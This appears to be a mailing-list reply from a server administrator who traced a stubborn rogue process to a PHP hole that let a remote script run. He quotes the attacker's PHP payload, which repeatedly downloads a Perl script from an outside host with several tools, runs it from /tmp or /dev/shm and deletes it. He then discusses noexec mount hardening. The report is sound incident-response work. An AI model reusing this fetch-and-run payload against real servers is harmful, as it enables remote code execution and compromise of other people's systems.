Re: ping22: can not kill this process
Hi folks
I found the issue, it is one of the php script allowing the remote script to run.
and the remote script is something like:
<?php
passthru('cd /tmp;wget
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;curl -o bb.txt http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f
bb.txt*');
passthru('cd /tmp;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;lynx -source
http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;fetch http://www.radiovirtual.org/bb.txt
> bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /tmp;GET http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;wget http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;curl -o bb.txt
http://www.radiovirtual.org/bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;lwp-download http://www.radiovirtual.org/bb.txt;perl bb.txt
;rm -f bb.txt*');
passthru('cd /dev/shm;lynx -source http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;fetch
http://www.radiovirtual.org/bb.txt > bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('cd /dev/shm;GET http://www.radiovirtual.org/bb.txt
> bb.txt;perl bb.txt;rm -f bb.txt*');
passthru('id');
?>
the /tmp was mounted as rw,noexec,nosuid, so it cannot run.
but not the /dev/shm, so the hacked script downloaded to /dev/shm, and run from there.
what kind applications are using /dev/shm? I googled around,seem not find much information.
right now I mount i as rw,noexec,nosuid.
Best Regards
Mike
Reply to: